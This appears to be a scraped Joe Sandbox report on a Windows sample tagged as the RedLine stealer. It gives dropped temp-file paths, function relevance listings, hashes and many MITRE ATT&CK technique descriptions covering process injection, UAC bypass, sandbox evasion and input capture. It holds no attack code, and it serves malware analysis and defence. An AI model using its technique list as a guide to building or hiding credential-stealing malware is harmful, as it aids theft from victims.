Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report pYHrqNhFKr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\f7051zI.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\h99af07.exe.log

C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe

C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe

C:\Users\user\AppData\Local\Temp\IXP001.TMP\imYkV36.exe

C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe

C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe

C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
pYHrqNhFKr.exe

Function 008A3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Function 008A1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Function 008A597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Function 008A4FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Function 008A2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Function 008A5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Function 008A2390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Function 008A3FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Function 008A2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Function 008A6F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 008A202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Function 008A55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Function 008A44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Function 008A53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre